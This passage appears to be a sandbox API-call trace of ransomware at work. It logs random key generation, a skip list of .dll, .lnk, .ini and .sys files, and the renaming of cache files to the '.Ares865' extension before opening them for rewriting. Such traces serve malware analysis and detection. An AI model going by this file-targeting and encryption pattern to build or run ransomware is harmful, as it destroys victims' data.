returned 1 [0110.664] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.664] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.665] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" | out: lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" [0110.665] lstrlenW (lpString="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 65 [0110.665] lstrlenW (lpString="Ares865") returned 7 [0110.665] lstrcmpiW (lpString1="3561873", lpString2="Ares865") returned -1 [0110.665] lstrlenW (lpString=".dll") returned 4 [0110.665] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2=".dll") returned 1 [0110.665] lstrlenW (lpString=".lnk") returned 4 [0110.665] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2=".lnk") returned 1 [0110.665] lstrlenW (lpString=".ini") returned 4 [0110.665] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2=".ini") returned 1 [0110.665] lstrlenW (lpString=".sys") returned 4 [0110.665] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2=".sys") returned 1 [0110.665] lstrlenW (lpString="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 65 [0110.666] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.Ares865") returned 155 [0110.666] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.ares865"), dwFlags=0x1) returned 1 [0110.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.667] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1763) returned 1 [0110.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.668] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.668] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.668] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.673] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.674] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.674] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.674] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" | out: lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" [0110.674] lstrlenW (lpString="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 65 [0110.674] lstrlenW (lpString="Ares865") returned 7 [0110.674] lstrcmpiW (lpString1="D16B7CE", lpString2="Ares865") returned 1 [0110.674] lstrlenW (lpString=".dll") returned 4 [0110.674] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2=".dll") returned 1 [0110.674] lstrlenW (lpString=".lnk") returned 4 [0110.674] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2=".lnk") returned 1 [0110.675] lstrlenW (lpString=".ini") returned 4 [0110.675] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2=".ini") returned 1 [0110.675] lstrlenW (lpString=".sys") returned 4 [0110.675] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2=".sys") returned 1 [0110.675] lstrlenW (lpString="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 65 [0110.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.Ares865") returned 155 [0110.675] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.ares865"), dwFlags=0x1) returned 1 [0110.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1763) returned 1 [0110.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.677] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.678] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.678] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.680] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.681] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.681] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.681] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" | out: lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" [0110.681] lstrlenW (lpString="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 65 [0110.681] lstrlenW (lpString="Ares865") returned 7 [0110.681] lstrcmpiW (lpString1="1D392CF", lpString2="Ares865") returned -1 [0110.681] lstrlenW (lpString=".dll") returned 4 [0110.681] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2=".dll") returned 1 [0110.681] lstrlenW (lpString=".lnk") returned 4 [0110.681] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2=".lnk") returned 1 [0110.681] lstrlenW (lpString=".ini") returned 4 [0110.681] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2=".ini") returned 1 [0110.681] lstrlenW (lpString=".sys") returned 4 [0110.681] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2=".sys") returned 1 [0110.681] lstrlenW (lpString="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 65 [0110.682] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Ares865") returned 155 [0110.682] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.ares865"), dwFlags=0x1) returned 1 [0110.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.684] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1763) returned 1 [0110.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.684] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.685] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.685] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.687] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.688] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.688] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.689] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" | out: lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" [0110.689] lstrlenW (lpString="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 65 [0110.689] lstrlenW (lpString="Ares865") returned 7 [0110.689] lstrcmpiW (lpString1="7D6E9CC", lpString2="Ares865") returned -1 [0110.689] lstrlenW (lpString=".dll") returned 4 [0110.689] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2=".dll") returned 1 [0110.689] lstrlenW (lpString=".lnk") returned 4 [0110.689] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2=".lnk") returned 1 [0110.689] lstrlenW (lpString=".ini") returned 4 [0110.689] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2=".ini") returned 1 [0110.689] lstrlenW (lpString=".sys") returned 4 [0110.689] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2=".sys") returned 1 [0110.689] lstrlenW (lpString="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 65 [0110.689] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.Ares865") returned 155 [0110.689] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.ares865"), dwFlags=0x1) returned 1 [0110.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.691] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1454) returned 1 [0110.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.691] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.695] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.696] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.696] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.697] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" | out: lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" [0110.697] lstrlenW (lpString="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 65 [0110.697] lstrlenW (lpString="Ares865") returned 7 [0110.697] lstrcmpiW (lpString1="9FE86DE", lpString2="Ares865") returned -1 [0110.697] lstrlenW (lpString=".dll") returned 4 [0110.697] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2=".dll") returned 1 [0110.697] lstrlenW (lpString=".lnk") returned 4 [0110.697] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2=".lnk") returned 1 [0110.697] lstrlenW (lpString=".ini") returned 4 [0110.697] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2=".ini") returned 1 [0110.697] lstrlenW (lpString=".sys") returned 4 [0110.697] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2=".sys") returned 1 [0110.697] lstrlenW (lpString="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 65 [0110.697] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.Ares865") returned 155 [0110.697] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.ares865"), dwFlags=0x1) returned 1 [0110.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.699] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1454) returned 1 [0110.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.699] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.700] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.700] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.710] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.711] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.711] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.711] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" | out: lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" [0110.711] lstrlenW (lpString="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 65 [0110.712] lstrlenW (lpString="Ares865") returned 7 [0110.712] lstrcmpiW (lpString1="4B14C2C", lpString2="Ares865") returned -1 [0110.712] lstrlenW (lpString=".dll") returned 4 [0110.712] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2=".dll") returned 1 [0110.712] lstrlenW (lpString=".lnk") returned 4 [0110.712] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2=".lnk") returned 1 [0110.712] lstrlenW (lpString=".ini") returned 4 [0110.712] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2=".ini") returned 1 [0110.712] lstrlenW (lpString=".sys") returned 4 [0110.712] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2=".sys") returned 1 [0110.712] lstrlenW (lpString="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 65 [0110.712] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.Ares865") returned 155 [0110.712] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.ares865"), dwFlags=0x1) returned 1 [0110.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.715] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1635) returned 1 [0110.715] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.715] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.715] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.715] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.716] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.716] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.719] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 